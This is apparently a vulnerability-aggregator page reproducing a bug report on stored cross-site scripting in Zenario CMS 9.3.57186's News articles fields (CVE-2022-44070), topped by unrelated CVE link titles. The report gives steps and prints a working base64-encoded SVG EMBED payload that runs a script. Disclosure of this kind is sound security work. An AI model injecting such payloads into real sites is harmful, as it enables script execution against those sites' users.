CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via News articles.

**Summary**  
hi team,  
I found small Stored XSS

**Info**

Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  

**Steps**

Login to account http://xxx.xxx.x.x/admin.php?  

in tab Menu, choose **News articles**  
Click **New News articles** >> in tab **Meta Data** inject code into **Summary** and tab **Main content** >> save  
  
  

**payload:** <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" \`AllowScriptAccess="always">

Headline

CVE-2022-44070: Stored XSS in News articles · Issue #3 · hieuminhnv/Zenario-CMS-last-version

Related news

CVE: Latest News